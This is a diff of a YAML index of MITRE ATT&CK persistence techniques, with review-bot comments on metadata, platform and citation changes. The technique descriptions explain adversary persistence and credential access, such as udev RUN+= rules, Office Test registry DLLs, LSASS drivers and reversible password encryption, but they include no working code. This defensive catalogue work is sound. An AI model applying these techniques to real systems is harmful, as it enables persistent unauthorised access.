- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
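Review bot: this hunk pairs the tail of T1556.001 with the head of T1556.005, so reading it line by line is misleading: the `id`, `created` and `external_references` for T1556.001 that the -34900 hunk removed are re-added here, while the T1556.005 header (`id: attack-pattern--d50955c2…`, its five references) is removed here and re-added in the next hunk. Verify the result by parsing rather than eyeballing: each of the two techniques should end up with exactly one `id`, one `external_id` equal to its parent key, and no duplicated reference entries. The substantive changes for T1556.001 are `revoked: false`, `x_mitre_version` 2.0 → 2.1, `x_mitre_attack_spec_version` 2.1.0 → 3.2.0 and the loss of `x_mitre_permissions_required: Administrator`; for T1556.005 only the `modified` stamp (2022-05-11 → 2024-08-26) changes in this hunk.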
@@ -35028,6 +35390,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -35038,23 +35401,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
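Review bot: `x_mitre_permissions_required` (User, Administrator) is dropped for T1556.005 here, as it was for T1556.001 and T1137.004 above, but entries this patch did not regenerate still carry the field (the `- Administrator` / `- User` items sitting above `x_mitre_attack_spec_version: 2.1.0` in T1037.005, T1543.001, T1547.007 and T1547.008 are untouched). After merge the field is therefore present for some techniques and absent for others depending only on whether the object was refreshed; document that, or strip it everywhere in one go, so consumers do not read its absence as "no privilege needed". The reference reorder (dump_pwd_dcsync moved ahead of store_pwd_rev_enc) is a no-op.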
@@ -35071,7 +35461,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
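Review bot: the contributor string changes from `Alexander Rodchenko` to `Rodchenko Aleksandr`, family name first, while the Power Settings hunk later in this patch changes `Goldstein Menachem` to `Menachem Goldstein`, given name first. If both strings are taken verbatim from upstream that is acceptable, but contributor lists are rendered as-is, so check whether one of the two is a transcription slip before it propagates into derived indexes.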
@@ -35130,7 +35520,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -35212,7 +35601,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -35327,12 +35715,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35355,16 +35742,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -35391,7 +35777,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -35460,7 +35845,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -35496,7 +35880,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35515,12 +35899,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35570,12 +35953,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35608,9 +35990,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
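Review bot: splitting `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two entries fixes the one-entry-two-people problem, but the `(Gurucul)` affiliation now attaches only to Nilesh Dherange; in the original string it followed both names and, read with the comma, plausibly applied to both. Confirm with upstream whether `Naveen Vijayaraghavan` should also carry the affiliation, otherwise the split quietly drops attribution.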
@@ -35627,9 +36010,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -35675,12 +36057,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35694,7 +36075,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35753,7 +36134,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -35779,7 +36159,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -35805,13 +36185,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35835,8 +36213,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -35866,7 +36244,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -35909,7 +36286,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35934,12 +36311,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35979,8 +36355,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -35988,13 +36366,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
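Review bot: T1078.004 loses `Azure AD`, `Office 365` and `Google Workspace` as platforms and gains `Office Suite` and `Identity Provider`. Unlike the other platform edits in this patch, this technique carries an atomic test (`Creating GCP Service Account and Service Account Key`, visible in the -36025 hunk below), so any per-platform index generated from `x_mitre_platforms` will stop listing that test under Google Workspace and Office 365; make sure the derived indexes are regenerated in the same change rather than left pointing at a platform the technique no longer declares. The `x_mitre_modified_by_ref` line added here, like the `x_mitre_attack_spec_version` added in the hunk above, is a move (both are removed at the bottom of the entry in the next hunk), not a duplicate.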
@@ -36025,9 +36403,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -36149,10 +36524,10 @@ persistence:
'
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
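Review bot: the sentence appended to the `+ description` line introduces `(Citation: Malicious Life by Cybereason)`, and the matching `external_references` entry is only added in the `@@ -36259` hunk further down, so the two hunks must land together or the citation dangles; separately, the new `Win32_ScheduledJob` WMI path is not obviously covered by the visible `x_mitre_data_sources` entries in the next hunk (`Command: Command Execution`, `Scheduled Job: Scheduled Job Creation`), so check whether a WMI-related data component should accompany the description change.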
@@ -36215,7 +36590,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -36249,8 +36624,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
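Review bot: the `+ url:` line swaps twitter.com for x.com and the `+ September 12, 2024.` retrieval date replaces the 2017 one for the same 2017 status; since tweet URLs disappear when an account is renamed, locked or deleted, an archived copy (web.archive.org) would be the more durable reference, as this file already does for the subt0x10.blogspot.com entry in the T1574.012 hunk below.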
@@ -36259,6 +36634,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
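Review bot: the `#blog-subscribe` fragment in the new `+ url:` line anchors to the page's subscription widget rather than the article and should be dropped, leaving `https://www.cybereason.com/blog/wmi-lateral-movement-win32`; the `+ description:` also uses "Philip Tsukerman. (n.d.)" where neighbouring entries use "Surname, Initial. (date)" (`Russinovich, M. (2016, January 4)`), so normalise the author form and replace `(n.d.)` with the post's publication date if the page carries one.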
@@ -36271,12 +36650,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -36289,6 +36667,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -36325,17 +36704,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
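Review bot: replacing the `Azure AD`, `Google Workspace` and `Office 365` platforms with `Office Suite` and `Identity Provider` in this hunk is consistent with the ATT&CK v16 platform consolidation, and the `x_mitre_version: '2.5'` bump matches it; anything derived from `x_mitre_platforms` (per-platform index files, matrices, filters keyed on the old platform names) needs regenerating in the same change, or T1556 silently drops out of those views.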
@@ -36381,9 +36760,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
